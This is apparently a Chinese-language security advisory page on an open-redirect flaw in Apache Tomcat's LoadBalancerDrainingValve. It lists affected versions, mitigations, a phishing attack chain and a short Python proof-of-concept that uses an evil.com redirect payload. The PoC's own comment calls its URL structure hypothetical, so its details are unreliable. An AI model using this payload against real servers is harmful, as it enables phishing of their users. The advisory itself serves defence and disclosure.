CVE-2026-25854 CVSS 6.1 中危

CVE-2026-25854 Apache Tomcat 开放重定向漏洞

披露日期: 2026-04-09

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-25854

漏洞类型

开放重定向

CVSS评分

6.1 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Apache Tomcat

漏洞概述

Apache Tomcat的LoadBalancerDrainingValve组件存在开放重定向漏洞。由于未对重定向目标进行有效校验，攻击者可利用该漏洞诱导用户访问恶意网站。该漏洞影响多个版本分支，可能导致网络钓鱼攻击，窃取用户敏感信息。

技术细节

该漏洞出现在Apache Tomcat的LoadBalancerDrainingValve处理逻辑中。当该阀门用于在负载均衡器排空节点时重定向流量时，它可能会根据用户可控的输入（如特定HTTP查询参数或头部）来确定重定向目标URL。由于代码缺乏对目标URL域名的白名单验证机制，攻击者可以构造包含外部恶意域名的请求。服务器收到请求后，会返回HTTP 302状态码，并将Location头设置为攻击者指定的URL。由于重定向来源于受信任的域名，用户容易放松警惕，从而在到达的恶意站点上输入敏感数据。

攻击链分析

STEP 1

Reconnaissance

Identify Apache Tomcat servers utilizing the LoadBalancerDrainingValve.

STEP 2

Weaponization

Construct a malicious URL containing a redirect parameter pointing to an attacker-controlled site.

STEP 3

Delivery

Distribute the malicious link to potential victims via email or social engineering.

STEP 4

Exploitation

Victim clicks the link; the server redirects them to the malicious site due to the vulnerability.

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
import requests

def check_open_redirect(target_host):
    # Hypothetical exploit URL structure based on vulnerable valve behavior
    # Attackers craft a URL that includes an external domain
    payload = "http://evil.com/phishing"
    attack_url = f"{target_host}/?redirect={payload}" 
    
    try:
        response = requests.get(attack_url, allow_redirects=False, timeout=5)
        if response.status_code == 302:
            location = response.headers.get('Location')
            if location and "evil.com" in location:
                print(f"[+] Vulnerability Confirmed! Redirecting to: {location}")
                return True
        print("[-] Vulnerability not detected.")
        return False
    except Exception as e:
        print(f"Error: {e}")

if __name__ == "__main__":
    check_open_redirect("http://localhost:8080")

影响范围

Apache Tomcat 11.0.0-M1 - 11.0.18

Apache Tomcat 10.1.0-M1 - 10.1.52

Apache Tomcat 9.0.0.M23 - 9.0.115

Apache Tomcat 8.5.30 - 8.5.100

防御指南

临时缓解措施

建议用户尽快升级官方发布的修复版本。如果暂时无法升级，应在反向代理层面（如Nginx或Apache HTTPD）过滤包含外部重定向参数的请求，或者直接禁用LoadBalancerDrainingValve以阻断攻击路径。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表